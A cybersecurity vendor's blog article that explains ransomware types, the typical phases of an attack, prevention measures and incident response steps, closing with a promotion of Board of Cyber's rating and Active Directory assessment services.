Blog of cyber
Ransomware is a type of malware that has become increasingly prevalent in the field of cybersecurity. This software encrypts an organization's data and demands a ransom in exchange for the decryption key.
The aim is to make them inaccessible, thereby preventing people from working and businesses from operating. These incidents have become more frequent and complex in recent years. For example, in 2024, there was an 8.5% increase (according to Ransomwatch worldwide) in ransomware attacks compared to 2023.
This trend continued in 2025, with a 47% increase in cyberattacks, including ransomware, in the first quarter. Organizations faced an average of 1,925 attacks per week.
Ransomware targets are no longer limited to personal computers, but also include critical information systems of businesses and institutions, compromising the security of sensitive data and business continuity. Sophisticated ransomware groups such as Cl0p, Akira, and RansomHub exploit zero-day vulnerabilities and use AI-powered automated phishing techniques.
This article provides an in-depth analysis of ransomware mechanisms, their various types, how they work, and, most importantly, the defense strategies best suited to these growing threats. We will also discuss the steps to take in the event of an incident and best practices for avoiding common mistakes.
Ransomware is malicious software designed to block access to an organization's critical data or systems in exchange for a ransom to restore access. From a technical standpoint, ransomware uses encryption, typically asymmetric, involving a public key to encrypt data and a private key to decrypt it. Upon installation, the malware communicates with the attackers' command and control (C2) servers to obtain the instructions necessary to carry out the attack.
Historically, the first ransomware dates back to the 1980s, but it was in the 2010s that its impact intensified, with notable incidents such as “WannaCry” in 2017. Since then, cybercriminals' techniques have evolved, incorporating sophisticated methods aimed at maximizing the effectiveness of attacks.
The emergence of the “Ransomware-as-a-Service” (RaaS) model illustrates this evolution. In this context, groups of cybercriminals offer preconfigured ransomware kits and support infrastructure to other criminals, often in exchange for a commission on the revenue generated. This democratization of ransomware tools allows a greater number of attackers, even those without advanced technical skills, to carry out effective attacks.
In addition, modern ransomware adopts double extortion strategies, combining data encryption with the threat of disclosing sensitive information, thereby increasing the pressure on victims. There is also triple extortion, notably with the top 1 Lockbit, which adds DDoS to get paid or offers to ransom collateral victims.
Ransomware comes in several categories, each characterized by its own methods of exploitation and objectives:
This is the most common type of ransomware, which partially encrypts files and data on the system, making them inaccessible without the decryption key. Cybercriminals demand a ransom in exchange for this key, ensuring that the compromised data will be restored.
Locker ransomware restricts all access to the system by blocking files and applications. A ransom demand screen, often accompanied by a countdown timer, urges the victim to act quickly to restore access.
Scareware simulates the detection of a major problem, such as a virus infection, prompting the victim to pay for a fictitious solution. Although often a scam, some variants can partially or completely lock the computer.
The RaaS model allows groups of cybercriminals to offer preconfigured ransomware packages and support infrastructure to other malicious actors. This service often includes ransomware distribution, payment collection, and decryption key management, making it easier to spread attacks without requiring in-depth technical expertise.
Double extortion combines data encryption with the threat of disseminating stolen information. This method significantly increases the pressure on victims, who are faced with the simultaneous need to recover their data and the threat of losing sensitive information.
Ransomware attacks mainly target countries with less robust cybersecurity infrastructure, such as certain regions of Asia and Eastern Europe, as well as the United States and Western Europe due to their economic importance and data density. The geographical origins of the attackers are often linked to countries such as Russia and China, although the anonymity inherent in the internet makes it difficult to attribute responsibility with any certainty.
Doxware threatens to disclose personal or sensitive company information if the ransom is not paid. This approach doubles the pressure, demanding not only payment for decrypting the data, but also to prevent the public disclosure of confidential information.
A ransomware attack is a structured and multifaceted process, involving several phases from initial intrusion to encryption execution. Here are the key steps and typical entry vectors:
The most common entry vectors include: • Phishing: Sending emails or messages containing malicious links or attachments that install malware when opened. • RDP (Remote Desktop Protocol): Exploiting unsecured RDP connections or using brute force attacks to access the internal network. This also includes all remote access applications that are exposed to the internet by design. • Software vulnerabilities: Exploiting unpatched flaws in software or systems to gain initial access. • Removable devices: Introduction of malware via infected USB drives.
After initial access, the attack progresses through several phases: • Reconnaissance and preparation: Exploration of the network to identify weaknesses and sensitive data, which can take from a few minutes to several weeks. Before LatMov, there is often PrivEsc: privilege escalation. The goal is to increase access in order to take control of the entire IT infrastructure (e.g., access the AD as an administrator, then access backups to delete them, identify interesting file servers, access hypervisors to facilitate encryption, deploy GPOs for propagation, etc.). • Establishment of a foothold: Installation of persistence tools to maintain access, even after a system reset. • Lateral movement: Propagation throughout the network by retrieving additional credentials and access privileges. • Data exfiltration: Transfer of data to the outside if the objective includes information theft. Often via cloud synchronization tools (rclone, etc.) or protocols such as FTP and to cloud destinations (mega, dropbox, ftp, etc.). • Data encryption: Encryption of files, making data inaccessible without the decryption key.
The “dwell time,” the period during which attackers remain present in the network before launching the final attack, can range from a few hours to several months. This phase allows them to gather strategic information and prepare the ground to maximize the impact of the attack.
The attack on the Colonial Pipeline in 2021 illustrated the ability of ransomware to disrupt critical infrastructure. Similarly, the “WannaCry” ransomware in 2017 infected millions of systems around the world, highlighting the need for proactive cybersecurity defenses.
To effectively protect yourself against ransomware, it is essential to adopt a comprehensive and proactive security strategy. Here are seven actions recommended by the National Agency for Information System Security (ANSSI) and other cybersecurity experts:
User training and awareness are essential to prevent ransomware attacks. Employees must be informed of the risks associated with phishing emails, infected attachments, and other attack vectors. Regular training programs and awareness campaigns help significantly reduce the risk of infection.
Regularly updating software, operating systems, and antivirus signatures is essential to patch vulnerabilities and prevent known security flaws from being exploited. This practice substantially reduces the risk of ransomware infection.
Performing regular data backups is the most effective measure for mitigating losses in the event of a ransomware attack. It is recommended to use offline storage solutions, such as external hard drives or magnetic tapes, to protect backups from infection of the main system. The recommendation for storing critical or sensitive data is the 3-2-1 rule: 3 copies of the data, in 2 locations and on 2 different technologies/hardware, including 1 offline (because attackers almost always delete online backups).
Segmenting the network into separate zones helps limit the spread of ransomware within the infrastructure. This approach involves restricting user access and privileges, as well as controlling Internet access, in accordance with the best practices recommended by ISO 27001.
User privilege management is a key preventive measure. By disabling administrator privileges for unauthorized users, you reduce the ability of attackers to move laterally within the network and access critical data.
Implementing intrusion detection and prevention tools (IDS/IPS) and anomaly detection solutions helps identify and block malicious activity before it causes significant damage. These tools must be regularly updated to remain effective against new threats, in accordance with NIST standards.
Developing an incident response plan is essential for effectively managing a ransomware attack. This plan should include procedures for isolating infected systems, restoring data from backups, and communicating with stakeholders. A well-defined communication strategy is also necessary to manage the fallout from the attack and minimize its impact on business operations.
In the event of a ransomware attack, a rapid and coordinated response is essential to minimize damage. RSSI/CIO, here are the steps to follow and best practices to adopt:
When the attack is detected, either by an employee or the technical teams, it is imperative to immediately isolate the affected systems from the rest of the network. This may include disconnecting Ethernet cables, disabling Wi-Fi, or powering down network equipment to prevent the malware from spreading.
Assess the scope of the attack by identifying the systems and data affected by encryption or exfiltration. Analyzing system logs can help detect early signs of the attack and reconstruct the timeline of events leading up to the infection.
Make a list of systems that are critical to the organization and rank them in order of importance. This prioritization makes it easier to restore essential business functions in an orderly and efficient manner.
Ensure secure communication with technical teams and management using secure communication tools such as Signal or external conferencing systems. Create separate groups for technical managers, communicators, and executives to effectively coordinate the crisis response.
Set up a crisis management team to coordinate all necessary actions to restore IT systems. This team should include business professionals, communications experts, legal experts, and business recovery managers, aligned with a common strategy to resolve conflicting priorities during the restoration of operations. Call on an external CERT: +1 800 234 8000 | [email protected]
It is important to avoid the following mistakes during a ransomware attack: • Paying the ransom without exploring all other options: payment does not guarantee the return of data and may encourage attackers. • Do not contact cybercriminals who are aware of the psychological levers and cognitive biases of victims who are in a state of shock/denial/anger/intense stress/fatigue/guilt... and therefore vulnerable. • Do not underestimate the impact of the attack: the consequences can be significant in terms of legal, financial, and reputational damage, requiring comprehensive incident management.
Adopt the following best practices for effective incident management: • Implement a segmentation and isolation plan: map the network and identify segments to quickly isolate infected systems. • Restore from backups: use reliable backups to restore impacted data and systems. • Document the incident: record all steps taken in response to improve future procedures and facilitate investigations.
Board of Cyber offers a comprehensive range of solutions and services designed to strengthen organizations' cybersecurity and protect them against ransomware threats. Here's how their offerings can help you:
The dashboards in Board of Cyber's Security Rating and AD Rating solutions provide comprehensive, continuous visibility into your organization's security posture. They centralize key information, enabling security teams to effectively monitor and manage ransomware-related risks and vulnerabilities.
Board of Cyber's AD Rating assesses the security of your Active Directory, a central component of enterprise networks. By protecting your Active Directory, you prevent ransomware attackers from exploiting access privileges and moving laterally across your network. This protection is essential for preventing attacks targeting administrator accounts and authentication systems.
With these tools and services, Board of Cyber offers a holistic approach to strengthening your security posture, detecting threats early, and responding effectively to ransomware attacks, minimizing risk and potential damage.
Board of Cyber's cyber rating assesses the maturity and effectiveness of your cybersecurity system. This assessment identifies areas for improvement and prioritizes security changes to strengthen your defense against ransomware and other cyber threats. Board of Cyber's maturity indicators measure your organization's level of preparedness and resilience against cyber threats. They identify gaps in security processes and policies, facilitating their improvement for better protection against ransomware.
Board of Cyber's compliance monitoring ensures that your organization complies with applicable security standards and regulations, such as ISO 27001, DORA, and NIS2. Ensuring compliance reduces the risk of vulnerabilities that can be exploited by ransomware attackers.
In summary, combating ransomware relies on rigorous governance and a strong security culture. Essential best practices include team awareness, keeping systems up to date, regular data backups, network segmentation, privilege restriction, deployment of detection tools, and development of an incident response plan.
These measures must be integrated into a robust security culture with clearly defined and regularly updated processes and policies. Solutions such as those offered by Board of Cyber can industrialize ransomware prevention and detection by providing dashboards, cybersecurity maturity assessments, and advanced alerting systems. It is imperative to act now by integrating these tools and practices into your cybersecurity strategy to protect your data and systems from these growing threats.
